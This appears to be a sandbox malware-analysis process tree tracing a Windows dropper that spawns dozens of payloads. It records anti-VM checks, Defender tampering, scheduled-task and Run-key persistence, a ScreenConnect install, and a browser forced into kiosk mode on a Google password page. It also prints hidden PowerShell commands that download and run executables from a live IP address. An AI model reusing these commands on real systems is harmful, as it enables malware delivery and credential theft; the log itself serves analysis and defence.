C:\Users\Admin\AppData\Local\Temp\3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe"C:\Users\Admin\AppData\Local\Temp\3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe"C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe"3⤵
- Executes dropped EXE
PID:2176
-
-
C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1256 -
C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"4⤵
- Executes dropped EXE
PID:1760
-
-
C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1848
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1256 -s 5084⤵
- Loads dropped DLL
- Program crash
PID:2392
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:696 -
C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:580
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 696 -s 5004⤵
- Loads dropped DLL
- Program crash
PID:864
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088207001\kdMujZh.exe"C:\Users\Admin\AppData\Local\Temp\1088207001\kdMujZh.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2352
-
-
C:\Users\Admin\AppData\Local\Temp\1088752001\sQ3DZPU.exe"C:\Users\Admin\AppData\Local\Temp\1088752001\sQ3DZPU.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:628 -
C:\ProgramData\apisysDirectx_11\apisysDirectx.exe"C:\ProgramData\apisysDirectx_11\apisysDirectx.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
PID:1160 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /tn apisysDirectx_11 /tr "C:\ProgramData\apisysDirectx_11\apisysDirectx.exe" /st 14:07 /du 23:59 /sc daily /ri 1 /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:264
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088919001\a1EoH8b.exe"C:\Users\Admin\AppData\Local\Temp\1088919001\a1EoH8b.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1168 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\91b7d375130f294a\ScreenConnect.ClientSetup.msi"4⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:868
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe"C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1076
-
-
C:\Users\Admin\AppData\Local\Temp\1089179101\b95bc460f0.exe"C:\Users\Admin\AppData\Local\Temp\1089179101\b95bc460f0.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1580 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 7ctn4maq0O2 /tr "mshta C:\Users\Admin\AppData\Local\Temp\Zt6zSS3iz.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:2848 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 7ctn4maq0O2 /tr "mshta C:\Users\Admin\AppData\Local\Temp\Zt6zSS3iz.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2944
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\Zt6zSS3iz.hta4⤵
- Modifies Internet Explorer settings
PID:2428 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'Q4ABZB21FBRJNNAJWSBP1TZVX8I8LS20.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1180 -
C:\Users\Admin\AppData\Local\TempQ4ABZB21FBRJNNAJWSBP1TZVX8I8LS20.EXE"C:\Users\Admin\AppData\Local\TempQ4ABZB21FBRJNNAJWSBP1TZVX8I8LS20.EXE"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1300
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\1089180021\am_no.cmd" "3⤵PID:1652
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1089180021\am_no.cmd" any_word4⤵PID:532
-
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:1408 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2664
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:2436 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1504
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:2152 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2360
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "ezbPqmaLvPI" /tr "mshta \"C:\Temp\9nmt3VMAT.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2564
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\9nmt3VMAT.hta"5⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2284 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1504 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1428
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089272001\95b5695165.exe"C:\Users\Admin\AppData\Local\Temp\1089272001\95b5695165.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2232 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:2476
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089273001\edfeb1d137.exe"C:\Users\Admin\AppData\Local\Temp\1089273001\edfeb1d137.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3016
-
-
C:\Users\Admin\AppData\Local\Temp\1089274001\5c9cf0fb93.exe"C:\Users\Admin\AppData\Local\Temp\1089274001\5c9cf0fb93.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2240 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2240 -s 8884⤵
- Loads dropped DLL
- Program crash
PID:3012
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089275001\amnew.exe"C:\Users\Admin\AppData\Local\Temp\1089275001\amnew.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:2248 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"4⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:1884 -
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1144 -
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2524
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 5606⤵
- Program crash
PID:2808
-
-
-
C:\Users\Admin\AppData\Local\Temp\10009640101\74caf6e3ae.exe"C:\Users\Admin\AppData\Local\Temp\10009640101\74caf6e3ae.exe"5⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4048
-
-
C:\Users\Admin\AppData\Local\Temp\10009650101\72bd9825d6.exe"C:\Users\Admin\AppData\Local\Temp\10009650101\72bd9825d6.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3520 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- System Location Discovery: System Language Discovery
PID:2972
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089276001\1225f1d26c.exe"C:\Users\Admin\AppData\Local\Temp\1089276001\1225f1d26c.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1224
-
-
C:\Users\Admin\AppData\Local\Temp\1089278001\DTQCxXZ.exe"C:\Users\Admin\AppData\Local\Temp\1089278001\DTQCxXZ.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1728
-
-
C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2904 -
C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:1524
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 5564⤵
- Program crash
PID:1924
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089280001\dzvh4HC.exe"C:\Users\Admin\AppData\Local\Temp\1089280001\dzvh4HC.exe"3⤵
- Executes dropped EXE
PID:2056
-
-
C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1464 -
C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1472
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1464 -s 5564⤵
- Program crash
PID:864
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2236 -
C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2948
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 5004⤵
- Program crash
PID:2564
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089285001\MAl7pjE.exe"C:\Users\Admin\AppData\Local\Temp\1089285001\MAl7pjE.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3240
-
-
C:\Users\Admin\AppData\Local\Temp\1089286001\05a9811bd3.exe"C:\Users\Admin\AppData\Local\Temp\1089286001\05a9811bd3.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3752
-
-
C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe"C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2904 -
C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe"C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3084
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 5084⤵
- Program crash
PID:2168
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089288001\sQ3DZPU.exe"C:\Users\Admin\AppData\Local\Temp\1089288001\sQ3DZPU.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3456
-
-
C:\Users\Admin\AppData\Local\Temp\1089289001\d317e9c8c3.exe"C:\Users\Admin\AppData\Local\Temp\1089289001\d317e9c8c3.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
PID:1440
-
-
C:\Users\Admin\AppData\Local\Temp\1089290001\a18028f754.exe"C:\Users\Admin\AppData\Local\Temp\1089290001\a18028f754.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1408
-
-
C:\Users\Admin\AppData\Local\Temp\1089291001\f2b5b2a0f4.exe"C:\Users\Admin\AppData\Local\Temp\1089291001\f2b5b2a0f4.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1972 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:4108
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089292001\2d9223dc79.exe"C:\Users\Admin\AppData\Local\Temp\1089292001\2d9223dc79.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2852
-
-
C:\Users\Admin\AppData\Local\Temp\1089293001\2c86c1330a.exe"C:\Users\Admin\AppData\Local\Temp\1089293001\2c86c1330a.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3536
-
-
C:\Users\Admin\AppData\Local\Temp\1089294001\caf15a14e4.exe"C:\Users\Admin\AppData\Local\Temp\1089294001\caf15a14e4.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2432
-
-
C:\Users\Admin\AppData\Local\Temp\1089295001\f5719c55e7.exe"C:\Users\Admin\AppData\Local\Temp\1089295001\f5719c55e7.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2856 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2964
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2656
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:1392
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2980
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2216
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:3288
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3296 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3296.0.1833253064\953239462" -parentBuildID 20221007134813 -prefsHandle 1264 -prefMapHandle 1256 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ac153fdf-e160-4a29-80a7-c1a9f9a7396c} 3296 "\\.\pipe\gecko-crash-server-pipe.3296" 1376 125d5a58 gpu6⤵PID:2236
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3296.1.248211140\1398163773" -parentBuildID 20221007134813 -prefsHandle 1524 -prefMapHandle 1504 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f8c0d960-3ee1-4bf4-83e2-803d8ccddcbb} 3296 "\\.\pipe\gecko-crash-server-pipe.3296" 1552 106fce58 socket6⤵PID:3568
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3296.2.1664222455\239836871" -childID 1 -isForBrowser -prefsHandle 2188 -prefMapHandle 2184 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 852 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ce3cdecc-f87d-4d2a-8f08-e4bd4eafb8bb} 3296 "\\.\pipe\gecko-crash-server-pipe.3296" 2200 1a1d4158 tab6⤵PID:3120
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3296.3.102826775\327996723" -childID 2 -isForBrowser -prefsHandle 2940 -prefMapHandle 2936 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 852 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a74fec05-1637-4102-8e48-2f473236c165} 3296 "\\.\pipe\gecko-crash-server-pipe.3296" 2956 1dac4b58 tab6⤵PID:3504
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3296.4.539866106\1711428922" -childID 3 -isForBrowser -prefsHandle 3876 -prefMapHandle 3872 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 852 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a8127ed6-485a-4f74-aabb-b4562cf284f6} 3296 "\\.\pipe\gecko-crash-server-pipe.3296" 3888 20b6a358 tab6⤵PID:3580
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3296.5.1076015716\609575687" -childID 4 -isForBrowser -prefsHandle 3984 -prefMapHandle 3988 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 852 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c21bc071-8dba-4885-9ba7-c372223a97d2} 3296 "\\.\pipe\gecko-crash-server-pipe.3296" 3972 20b6af58 tab6⤵PID:3508
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3296.6.1247096762\547485941" -childID 5 -isForBrowser -prefsHandle 4084 -prefMapHandle 4088 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 852 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d67d9e6d-49c3-4095-806f-f74df2ce6ecd} 3296 "\\.\pipe\gecko-crash-server-pipe.3296" 4072 20b69a58 tab6⤵PID:3656
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089296001\31459b3435.exe"C:\Users\Admin\AppData\Local\Temp\1089296001\31459b3435.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2044 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn zPE3vmapAB1 /tr "mshta C:\Users\Admin\AppData\Local\Temp\bikxt7N9V.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:2948 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn zPE3vmapAB1 /tr "mshta C:\Users\Admin\AppData\Local\Temp\bikxt7N9V.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:3516
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\bikxt7N9V.hta4⤵
- Modifies Internet Explorer settings
PID:3484 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'U2TEZ23I5J0ZUAYK7HXTUCUFRP5NRAZI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:1524 -
C:\Users\Admin\AppData\Local\TempU2TEZ23I5J0ZUAYK7HXTUCUFRP5NRAZI.EXE"C:\Users\Admin\AppData\Local\TempU2TEZ23I5J0ZUAYK7HXTUCUFRP5NRAZI.EXE"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3680
-
-
-
-
-
